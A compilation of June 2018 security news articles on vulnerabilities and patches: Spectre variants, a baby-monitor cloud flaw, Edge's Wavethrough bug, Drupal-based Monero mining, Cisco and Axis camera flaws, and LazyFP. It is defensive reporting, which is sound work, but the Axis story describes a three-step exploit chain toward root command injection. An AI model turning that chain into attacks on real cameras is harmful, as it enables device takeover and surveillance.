In May, tech giants Intel, AMD, ARM, IBM, Microsoft and other tech firms teamed to disclose two new variants of both Meltdown and Spectre issues.

The so-called Variant 4 (CVE-2018-3639) relies on a Speculative Store Bypass (SSB), while the Variant 3a (CVE-2018-3640) is a Rogue System Register.

Both Variant 4 and Variant 3a could be exploited by a local attacker for this reason they have been rated “medium severity”

According to Oracle’s security advisory, Variant 4 affects Oracle Linux versions 6 and 7, and Oracle VM 3.4,

“Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.” reads the security advisory published by Oracle.

Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel.

“Two new processor vulnerabilities were publicly disclosed on May 21, 2018. They are vulnerabilities CVE-2018-3640 ( “Spectre v3a” or “Rogue System Register Read”) and CVE-2018-3639 (“Spectre v4” or “Speculative Store Buffer Bypass”). Both vulnerabilities have received a CVSS Base Score of 4.3.

Successful exploitation of vulnerability CVE-2018-3639 requires local access to the targeted system. Mitigating this vulnerability on affected systems will require both software and microcode updates.” states Oracle in a blog post

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,”

Oracle promptly addressed the initial Meltdown and Spectre vulnerabilities in January 2018 Critical Patch Update just after their disclosure.

Since January, other side-channel attacks have been discovered, including BranchScope, SgxPectre, and the attacks against the System Management Mode (SMM) memory.


Oracle Patches New Spectre, Meltdown Vulnerabilities
25.6.2018 securityweek   
Vulnerebility

Oracle announced on Friday that it has started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown vulnerabilities.

Intel, AMD, ARM, IBM, Microsoft and other major tech companies last month coordinated the disclosure of two new variants of the speculative execution attack methods known as Meltdown and Spectre.

One of them, dubbed Variant 4, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. The second flaw, tracked as Variant 3a and CVE-2018-3640, is a Rogue System Register Read issue first documented by ARM back in January.

Variant 4 and Variant 3a have been rated “medium severity” and exploitation requires local access to the targeted system, Eric Maurice, director of security assurance at Oracle, noted in a blog post.

Maurice says Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel. According to Oracle’s advisory, Variant 4 impacts Oracle Linux versions 6 and 7, and Oracle VM 3.4.

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,” Maurice said.

Oracle patched the initial Meltdown and Spectre vulnerabilities in many of its products with the release of the January 2018 Critical Patch Update.

IBM has also released both operating system and firmware updates to patch Variant 4 in its Power Systems clients. Microsoft did implement some mitigations, but the company claims it has yet to identify any code patterns – in either its software or cloud services – that would allow Variant 4 attacks.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered methodhas allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


Vulnerabilities in Fredi Wi-Fi baby monitor can be exploited to use it a spy cam
25.6.2018 securityaffairs
Vulnerebility

Vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.
Security researchers at SEC Consult reported discovered that vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.

Fredi Wi-Fi baby monitor

The investigation started when a mother from South Carolina USA, Jamie Summitt, claimed someone had taken control over the baby monitor.

Many commercial surveillance products leverage a “P2P cloud” feature that is enabled by default. Every device connects to a cloud server infrastructure and keeps this connection up. Mobile devices and desktop applications can connect to the camera via the cloud.

This architecture makes it easier for users to interact with the camera, no firewall rules, port forwarding rules or DDNS setup are required on the router. But this approach has many security drawbacks as highlighted by the researchers:

The cloud server provider gets all the data (e.g. video streams that are viewed).
Open questions: Who runs these servers? Where are they located? Do they comply with local jurisdiction, e.g. also EU GDPR?
If the data connection is not properly encrypted, anyone who can intercept the connection is able to monitor all data that is exchanged.
The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the “P2P Cloud”.
The experts discovered that the P2P service connects directly to the cloud and can be accessed with no more than an 8-digit device number and a shared default password.

This means that everyone accessing to the online portal could enter random numbers with the default password to view camera feeds.

“Unfortunately the device ID does not look very secure,” reads the post published by the researchers.

“Plus the default password is neither randomly generated nor device-specific. Unless the user has changed the password to a secure one, anyone can log in and interact with the camera by ‘trying’ different cloud IDs.”

SEC Consult researchers added that insecure Fredi Wi-Fi baby monitors could also be used by hackers as an entry point in the home networks that host them.

“The ‘P2P Cloud’ feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the ‘P2P Cloud’.” continues the report.

Is the problem limited to the Fredi Wi-Fi baby monitor?

Unfortunately no, because the Chinese company that provided the firmware for the Fredi baby monitors develops generic camera control apps for many other devices.

“Obviously, the device and the cloud service is not GDPR compliant.” conclude the experts.

“It seems that consumer electronics with opaque supply chains, paired with insecure, built-in cloud features that are enabled by default will keep us busy in the future,”

The experts also published IoCs to detect the presence of devices using the Gwelltimes “Cloud-Links” platform in infrastructure.


Wavethrough CVE-2018-8235 flaw in Microsoft Edge leaks sensitive data
24.6.2018 securityaffairs
Vulnerebility

A flaw in the Edge browser, dubbed Wavethrough, addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited to read restricted data.
A bug in the Edge browser addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited by attackers via malicious or compromised websites to read restricted data.

The flaw was reported by Google developer Jake Archibald, it was tracked as CVE-2018-8235 and ties the way the browser handles requests of different origins.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins.” reads the security advisory published by Microsoft.

“The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.”

An attacker could exploit the vulnerability to force the browser to leak restricted data. The attack scenarios could involve maliciously crafted websites, compromised domains, or websites that accept or host content provided by the user or advertisements.

The flaw was dubbed Wavethrough because the issue occurs when a site leverages service for the loading of multimedia content, and the < audio > web API, which leverages “range” requests.

“Browsers use this for resuming downloads, but it’s also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it’s one of those annoying media formats that has important metadata at the end of the file.” wrote Archibald.

“Unfortunately, via a service worker, that Range header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call “no-cors” requests. Let’s push that onto the stack too”

The problem is caused by the fact that the Range header was missing via a service worker because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that.” continues the researcher.

“If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.”

The expert highlighted that using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks resulting in the leakage of sensitive data.

The researcher observed that a “No-cors” request is sent with cookies and receive opaque responses, this implies that some APIs may access the data in these responses.

“Take <img> for instance. If you include an <img> that points to another origin, it’ll make a no-cors request to that origin using that origin’s cookies. If valid image data is returned, it’ll display on your site. Although you can’t access the pixel data of that image, data is still leaked through the width and height of the image. You also know whether or not you received valid image data.” concluded the expert.

“Let’s say there’s an image that’s only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img> whether that user is logged into that site. The user’s privacy has been compromised. Yaaaay.”

Archibald described an attack scenario based on a specially crafted website that allowed him to discover that the beta and nightly versions of Firefox could allow the redirect and eventually exposed the duration of the requested audio. The bug was already patched by Mozilla.

The expert discovered that Edge was vulnerable, but the browser also allowed the resulting audio to pass through the web audio API. An attacker could exploit the flaw to monitor the samples being played. Expert noticed that the request is made with cookies, this means that the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” concluded the expert.


"Wavethrough" Bug in Microsoft Edge Leaks Sensitive Information
23.6.2018 securityweek 
Vulnerebility

A security vulnerability patched by Microsoft earlier this month in its Edge browser could be exploited via malicious or compromised websites to read restricted data.

Tracked as CVE-2018-8235, the flaw occurs in how “Microsoft Edge improperly handles requests of different origins,” Microsoft explains in an advisory. The issue results in Edge bypassing Same-Origin Policy (SOP) restrictions and allows for requests that should otherwise be ignored.

As a result, an attacker could exploit the vulnerability to force the user’s browser to send data otherwise restricted. Attacks could be performed via maliciously crafted websites, compromised domains, or through websites that accept or host user-provided content or advertisements.

The vulnerability was discovered by Google developer Jake Archibald, who named it Wavethrough, because the bug occurs when a site uses service workers for the loading of multimedia content, and the < audio > web API, which makes use of “range” requests.

The Range headers can be used by “media elements if the user seeks the media, so it can go straight to that point without downloading everything before it,” Archibald explains.

What the security researcher discovered was that, via a service worker, the Range header was missing, because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that,” he notes.

When using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks, which could result in sensitive data being leaked. No-cors request are sent with cookies and receive opaque responses, and some APIs may access the data in these responses.

Thus, when a media element makes a no-cors request with a Range header, fetch() removes the header, because it isn’t allowed in no-cors requests. However, because Range requests were never standardized in HTML, and because service workers are involved, a website could respond to them arbitrary.

“You can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img> on your page that points to facebook.com, but your service worker could return data from twitter.com,” the researcher explains.

After setting up a website that would do just that, Archibald discovered that the beta and nightly versions of Firefox allowed the redirect and eventually exposed the duration of the requested audio. The bug was patched before it made it to the stable Firefox release.

Edge too was found vulnerable, but it also allowed the resulting audio to pass through the web audio API, thus allowing for the monitoring of the samples being played. Because the request is made with cookies, the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” the researcher points out.

In addition to getting the bug addressed in Firefox and Edge, Archibald has been working on changing the standards regarding Range requests, so as to eliminate similar security issues. Furthermore, his discovery resulted in CORB being added to fetch().


Crooks exploit CVE-2018-7602 Drupal flaw, aka Drupalgeddon3 to deliver Monero miner
23.6.2018 securityaffairs
Vulnerebility

Crooks are attempting to exploit a recently patched Drupal vulnerability, tracked as CVE-2018-7602, to drop Monero mining malware onto vulnerable systems.
The CVE-2018-7602 flaw is a highly critical remote code execution issue, also known as Drupalgeddon3, that was addressed by the Drupal team in
April with the release of versions 7.59, 8.4.8 and 8.5.3.

The security patch for the flaw only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been installed on the install.

In May, security experts at Malwarebytes reported that crooks were exploiting both Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Now experts from Trend Micro reported network attacks exploiting CVE-2018-7602 flaw for Monero-mining. Crooks used an exploit to fetch a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malicious code adds a crontab entry to automatically update itself and to download and execute a modified variant of the open-source XMRig (version 2.6.3) Monero miner.

“We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.” reads the analysis published by TrendMicro.

“While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.”

The attackers used to hide their activity behind the Tor network, experts tracked it to 197[.]231[.]221[.]211, an address that belongs to a range of IPs associated with a virtual private network (VPN) provider.

The downloader checks the target machine to determine if it could be compromised using the Drupal exploits.

Once executed, the miner will change its process name to [^$I$^] and access the file /tmp/dvir.pid.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” continues the report.

CVE-2018-7602

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider.

Trend Micro confirmed that its experts have blocked 810 attacks coming from this IP address, at the time there is no evidence that all the attacks were related to the Monero-mining payload.

“The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead (CVE-2017-5674), and a memory leak flaw in Apache (CVE-2004-0113).” states Trend Micro.

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address.”

Drupal admins urge to install the available patches as soon as possible to avoid being hacked.


Hackers Exploit Drupal Flaw for Monero Mining
22.6.2018 securityweek 
Vulnerebility

Network attacks exploiting a recently patched Drupal vulnerability are attempting to drop Monero mining malware onto vulnerable systems, Trend Micro reports.

Tracked as CVE-2018-7602 and considered a highly critical issue that could result in remote code execution, the vulnerability impacts Drupal’s versions 7 and 8 and was addressed in April this year.

The flaw is dubbed Drupalgeddon3 and the patch for it only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been applied.

Last month, hackers were observed targeting both security vulnerabilities to deliver a variety of threats, including cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Trend Micro now says they noticed network attacks exploiting CVE-2018-7602 to turn affected systems into Monero-mining bots. As part of the observed incidents, the exploit fetches a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malware adds a crontab entry to automatically update itself and also retrieves and installs a Monero-mining application, a modified variant of the open-source XMRig (version 2.6.3). The use of XMRig is a feature common to most attacks attempting to mine for Monero.

The downloader also checks the target machine to determine whether it is worth compromising.

When executed, the mining application changes its process name to [^$I$^] and accesses the file /tmp/dvir.pid, Trend Micro says.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” the security firm notes.

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider. This IP address is a Tor exit node.

Over the past month, the security firm has blocked 810 attacks coming from this IP address, but cannot confirm that they were all related to the Monero-mining payload or performed by the same actor.

Most of the attacks attempt to exploit the Heartbleed vulnerability (CVE-2014-0160), while others target ShellShock (CVE-2014-6271), a flaw in WEB GoAhead (CVE-2017-5674), and an old memory leak in Apache (CVE-2004-0113).

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address. Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth,” the security researchers warn.

Patched Drupal installations should be safe from the recent attacks and site admins are advised to apply the available patches as soon as possible, to ensure their systems remain secure.


Cisco Patches Critical Flaws in NX-OS Software
22.6.2018 securityweek
Vulnerebility

Cisco on Wednesday released patches for more than 30 security vulnerabilities in its products, including Critical flaws impacting NX-OS Software.

A total of five Critical arbitrary code execution vulnerabilities were addressed with this set of security patches, impacting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The bugs can be exploited by unauthenticated, remote attackers to cause a buffer overflow, execute arbitrary code (as root, in some cases), cause a denial of service (DoS) condition, or read sensitive memory content on an affected device.

The bugs impact multiple devices, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Firepower 4100 and Firepower 9300 products, UCS 6100 to UCS 6300 Series Fabric Interconnects, and MDS 9000 Series Multilayer Switches.

Cisco also addressed High risk vulnerabilities impacting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The issues affecting NX-OS include command-injections in the CLI and NX-API, denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor, elevation of privilege in role-based access control (RBAC), remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature, DoS in the Border Gateway Protocol (BGP) implementation, elevation of privilege in NX-API.

Flaws also affecting FXOS Software include unauthorized administrator account in the write-erase feature, DoS conditions in the Discovery Protocol (formerly known as CDP) subsystem and Cisco Fabric Services component, and arbitrary code execution in the Cisco Discovery Protocol component.

Issues affecting only FXOS Software include an arbitrary code execution vulnerability in the CLI parser and a denial of service bug in the web UI.

Additionally, Cisco patched DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

A path traversal vulnerability was resolved in the process of uploading new application images to the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance.

As part of this set of security updates, Cisco also addressed 10 Medium risk flaws in TelePresence Video Communication Server (VCS) Expressway, Unified Communications Manager IM & Presence Service (formerly CUPS), NX-OS Software, NVIDIA TX1 BootROM, Meeting Server, Firepower Management Center, 5000 Series Enterprise Network Compute System and Unified Computing (UCS) E-Series Servers, and AnyConnect Secure Mobility Client for Windows Desktop.

Software updates were released for the vulnerable products. Cisco customers with valid licenses are advised to upgrade to an appropriate release. Details on the resolved vulnerabilities and the affected products and devices are available on Cisco’s website.


Cisco security updates address five critical issues in NX-OS Software
22.6.2018 securityaffairs
Vulnerebility

Cisco released security patches for more than 30 vulnerabilities, including five Critical arbitrary code execution issues affecting the NX-OS Software
Cisco released security patches for more than 30 vulnerabilities including five Critical arbitrary code execution issues affecting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The vulnerabilities can be remotely exploited by unauthenticated attackers to trigger a buffer overflow and execute arbitrary code (as root, in some circumstances), cause a denial of service (DoS) condition, or read sensitive memory content on vulnerable devices.

According to CISCO, many devices are affected by the critical vulnerabilities, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 to UCS 6300 Series Fabric Interconnects, Firepower 4100 and Firepower 9300 products, and MDS 9000 Series Multilayer Switches.

Security updates also address High-risk vulnerabilities affecting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The vulnerabilities affecting NX-OS include:

command-injections in the CLI and NX-API;
denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor;
elevation of privilege in role-based access control (RBAC);
remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature;
DoS in the Border Gateway Protocol (BGP) implementation;
elevation of privilege in NX-API;
CISCO NX-OS Software

Security updates issued by Cisco also addressed DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

Further details on the vulnerabilities and the affected products are available on Cisco Security Advisories and AlertsCisco Security Advisories and Alerts page.


Researchers Find 21,000 Exposed Container Orchestration Systems
21.6.2018 securityweek 
Vulnerebility

Researchers Discovered More Than 21,000 Container Orchestration and API Management Systems Exposed to the Public Internet

Public cloud and container technology is increasingly used by IT people because of the ease and speed of deployment, ephemeral workloads, and the ability to scale quickly and easily -- basically, the agility that public cloud and containers brings to DevOps. Popular container orchestration systems include Kubernetes, Docker Swarm, OpenShift and Mesosphere.

Container clusters are commonly managed, or orchestrated, from administrator dashboards that provide a single interface to manage all aspects of the containers. Kubernetes says it is comprised of a set of independent, composable control processes that continuously drive the current state towards the provided desired state. It says it eliminates the need for orchestration; but also says it orchestrates computing, networking, and storage infrastructure on behalf of user workloads.

The point, however, is that all the different container orchestrations provide a single administrative dashboard for administrator control. This dashboard can spin up new containers, delete unwanted containers, and access both the compute power and stored data on every container. Rarely, if ever, should this dashboard need to be visible to the internet.

"In early June 2018," states Lacework in a study (PDF) released Tuesday, "Lacework discovered more than 21,000 container orchestration and management systems on the internet, and these results highlight the potential for attack points caused by poorly configured resources, lack of credentials, and the use of non-secure protocols."

The issue here is that if a system is exposed to the internet when it need not be -- indeed should not be -- then it is likely that is inadequately secured. If it has been configured to require multi-factor authentication, then access to the orchestration system will have some defense. But, "simple authentication simply won't be good enough," Lacework's chief security architect, Dan Hubbard, told SecurityWeek: "if you have 'admin' and 'abc123', anyone who can find the admin panel will be able to crack it."

The report notes that most of the management nodes it discovered are configured to require access credentials, but adds, "These organizations, and the others who will replicate their mistakes, are opening themselves up to brute force password and dictionary attacks."

It is generally considered that password security on its own is ineffective. But an insecure container orchestration system exposed on the internet is a bigger threat to a company's cloud-based container infrastructure than a backdoor into a traditional data center. The latter might provide access to a single server under the oversight of the security team and with additional security controls within the data center infrastructure. A container orchestration dashboard, however, provides immediate access to every container in the swarm.

"Consider what would happen," warns the report, "if [attackers] had all this but could operate their attack all from the Internet, hiding behind proxy servers, VPN concentrators, and compromised routers, essentially masking who they are and where they are coming from. Basically, your data, your customer’s data, and the foundation on which you’ve built your organization would be in major trouble."

Hubbard believes the basic problem that leaves orchestration dashboards visible to any potential attacker is a disconnect between the DevOps team and the security team. Faced by the need for development speed, DevOps uses containers for all the right reasons. But containers are outside of the traditional security perimeter; and the security team may not even be aware of their use.

"We need to build a bridge from DevOps to security if one doesn't already exist -- that's the missing piece here," said Hubbard. "It's about communicating and making sure that the security team has the tools to know when this is happening. It's a combination of communication, working together, and for the security team making sure they know when it is happening and/or can detect and handle it when it does happen."

Exposed container orchestration dashboards are potentially far more dangerous than the more frequently discussed misconfigured S3 buckets. S3 buckets are simple storage devices. Misconfiguration of S3 buckets gives unauthorized access to the stored content, but gives no access to any compute capability.

"The most common attack we are seeing now," explained Hubbard, "is that attackers are finding these open servers and they are going in there without the company being aware. The attackers are installing their own software and they're starting new machines and new containers in order to do bitcoin mining. They're doing this through these open panels they find on the internet. In this scenario the bad guys are getting access to your compute -- on all the machines -- and they can install their own code and run whatever they want; and they can access your data. So, it's a lot more powerful than just finding a mis-configured S3 bucket."

"Let’s be clear," says the Lacework report. "We are BIG BELIEVERS in all things public cloud, but we need to raise the bar, and raise it quick." The important thing here is to remove the orchestration panels from the internet.

"You should be able to connect securely through another way," advises Hubbard, "whether it's through a central server or through a direct connection through a VPN. Also, depending on the management technology... if its K8 or whatever... they all have different defaults that they ship with and different ways you can configure authentication. Of course, MFA is the best."

The high-level message from this report is that if you are a developer deploying in the public cloud, then you have a responsibility to think about security; and if you are a security person, and you think that your company is or might be deploying in the public cloud, it's your responsibility to find out and then to deploy technologies and processes around that to make sure that you are secure. At the moment, there are too many examples of this not happening.


Hacking more than 400 Axis camera models by chaining 3 flaws
19.6.2018 securityaffairs
Vulnerebility

Researchers from cybersecurity firm VDOO have discovered several vulnerabilities affecting nearly 400 security cameras from Axis Communications.
Researchers from cybersecurity firm VDOO have conducted a study on IoT devices and discovered seven vulnerabilities in cameras manufactured by Axis Communications. According to the vendor, nearly 400 models are affected by the issue and Axis has released security patches for each flaw.

An attacker can remotely take over a camera by knowing its IP address, exploiting the flaws it is possible to access and freeze the video stream, control every function of the camera (e.g. motion detection, direction) and also to alter the software.

Experts warn that an attacker can compromise cameras to recruit them in a botnet that could be used to power a broad range of attacks, such a DDoS and cryptocurrency mining.

“One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.” reads the analysis published by VDOO.

“Chaining three of the reported vulnerabilities together, allows an unauthenticated remote attacker that has access to the camera login page through the network (without any previous access to the camera or credentials to the camera) to fully control the affected camera.”

The experts published Technical details for each issue and related proof-of-concept (PoC) code.

The researchers demonstrated that chaining three vulnerabilities it is possible to hack Axis cameras by sending specially crafted requests as root (CVE-2018-10662) and bypassing authentication (CVE-2018-10661), then injecting arbitrary shell commands (CVE-2018-10660).

Below the attack sequence demonstrated by the researchers:

Step 1: The attacker uses an authorization bypass vulnerability (CVE-2018-10661) to send unauthenticated HTTP requests that reach the .srv functionality (that handles .srv requests) inside /bin/ssid. Normally, this functionality should only be accessible to administrative users.
Step 2: The attacker then utilizes an interface that allows sending any dbus message to the device’s bus, without restriction (CVE-2018-10662), that is reachable from /bin/ssid’s .srv. Due to the fact that /bin/ssid runs as root, these dbus messages are authorized to invoke most of the system’s dbus-services’ interfaces (that were otherwise subject to a strict authorization policy). The attacker chooses to send dbus messages to one such dbus-service’s interface – PolicyKitParhand, which offers functions for setting parhand parameters. The attacker now has control over any of the device’s parhand parameter values. (See the next vulnerability).
Step 3: A shell command injection vulnerability (CVE-2018-10660) is then exploited. Some parhand parameters (of type “Shell-Mounted”) end up in configuration files in shell variable assignment format, which are later, included in a service’s init-script that runs as root. Due to step-2, the attacker is able to send unauthenticated requests to set parhand parmeter values. By doing so, the attacker can now exploit this vulnerability by setting one parameter’s value with special characters which will cause command injection, in order to execute commands as the root user.
The remaining vulnerabilities discovered by VDOO can be exploited by unauthenticated attackers to obtain information from the memory o to trigger a DoS condition.

axis cameran flaws

Axis published a security advisory that includes the complete list of all impacted cameras and the firmware version that address the vulnerabilities.

As part of the same study on the security of IoT devices, researchers at VDOO discovered several vulnerabilities in Foscam cameras.


Critical Flaws Expose 400 Axis Cameras to Remote Attacks
18.6.2018 securityweek  
Vulnerebility

Roughly 400 security cameras from Axis Communications are affected by several vulnerabilities, including critical flaws that can be chained to take complete control of a device and access its video stream.

As part of its research into IoT devices, cybersecurity firm VDOO has uncovered a total of seven vulnerabilities in cameras made by Axis. The vendor has identified nearly 400 affected models and released patches for each of them.

According to VDOO, an attacker who knows the targeted camera’s IP address can remotely and without authentication take full control of the device. This includes accessing its video stream, freezing the video stream, controlling the direction and functions of the camera (e.g. motion detection), adding the device to a botnet, altering its software, leveraging it for lateral movement within the network, abusing it for DDoS attacks and cryptocurrency mining, and rending the camera useless.Critical vulnerabilities found in Axis cameras

There are three vulnerabilities that can be chained to remotely hack a device. These allow an attacker to bypass authentication (CVE-2018-10661), send specially crafted requests as root (CVE-2018-10662), and inject arbitrary shell commands (CVE-2018-10660).

The other flaws discovered by VDOO can be exploited by unauthenticated attackers to crash various processes or to obtain information from the memory.

Critical vulnerabilities found in Axis cameras

Technical details and proof-of-concept (PoC) code have been made public for each of the vulnerabilities.

Axis has published an advisory containing the names of all impacted cameras and which firmware version contains patches.

This was not the first time researchers discovered vulnerabilities in cameras from Axis. Roughly one year ago, Senrio found a security hole, dubbed Devil’s Ivy, that allowed an attacker to cause a DoS condition or execute arbitrary code on Axis cameras. Since that flaw affected a third-party component, other IoT devices were affected as well.

As part of its research into IoT products, VDOO also discovered serious vulnerabilities in Foscam cameras. Foscam also released patches, unlike last year when researchers were forced to disclose multiple flaws after the vendor failed to take action.


Microsoft Patches Code Execution Vulnerability in wimgapi Library
16.6.2018 securityweek
Vulnerebility

Microsoft this week patched a remote code execution vulnerability affecting the wimgapi library, which is used to perform operations on Windows Imaging Format (WIM) files.

Addressed as part of Microsoft’s June 2018 Patch Tuesday, the issue was discovered by Talos’ Marcin Noga in the LoadIntegrityInfo functions of wimgapi version 10.0.16299.15 (WinBuild.160101.0800). An attacker exploiting the flaw could use a specially crafted WIM image to cause heap corruption and achieve direct code execution.

Tracked as CVE-2018-8210, the vulnerability resides in the DLL used to perform operations on the file-based disk image format that Microsoft created to simplify the deployment of Windows systems. The bug manifests in the LoadIntegrityInfo function when a WIM file header is parsed and can be triggered “even on the simplest operations performed on malformed WIM file,” the researcher says.

“For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It is using these values without any prior input checks,” Noga explains.

An attacker exploiting the vulnerability could execute malicious code with the same access rights as the logged-in user. They could also crash the system with a denial-of-service attack, the researcher says. Because WIM files do not have a registered file type handler by default, the issue cannot be triggered if the user double-clicks a WIM file, unless a file-handler was registered first.

According to Talos, the vulnerability has a CVSSv3 score of 8.8. Microsoft, on the other hand, claims that the bug only has a CVSS score of 7.3 and that it is considered Important.

The remote code execution vulnerability “exists when Windows improperly handles objects in memory,” the software giant explains. The company also notes that an attacker able to successfully exploit the issue could control a vulnerable system.

Microsoft also adds that an attacker targeting the vulnerability “would first have to log on to the target system and then run a specially crafted application.”

To address the vulnerability, Microsoft released an update that corrects the manner in which Windows handles objects in memory. No mitigations or workarounds exist for this vulnerability, meaning that users need to install the recently released patch to keep systems safe.

Impacted products include Windows 10 (both 32-bit and 64-bit versions), Windows 8.1 (32-bit and 64-bit), Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server version 1709, and Windows Server version 1803.


A new Meltdown-like flaw tracked as LazyFP affects Intel CPUs

16.6.2018 securityaffairs Vulnerebility

A new vulnerability involving side channel speculative execution on Intel chips, known as LazyFP, has been announced and assigned CVE-2018-3665.
A new vulnerability tracked as LazyFP (CVE-2018-3665) involving side channel speculative execution affects Intel CPUs, like previous ones it could be exploited by hackers to access sensitive information from the affected system.

The vulnerability was discovered by Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG.

The vulnerability resides in the floating point unit (FPU) that is used by the operating system when switching between processes. It is used to save the current context (state of the current process and registries) and restores the context of the new process.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” reads the advisory published by Intel.

There are two types of switching, Lazy FPU and Eager FPU, the former has better performance on older systems.

Security researchers discovered recently that if the Lazy method if vulnerable to attacks that could expose FPU state data, which can contain sensitive information such as cryptographic keys.

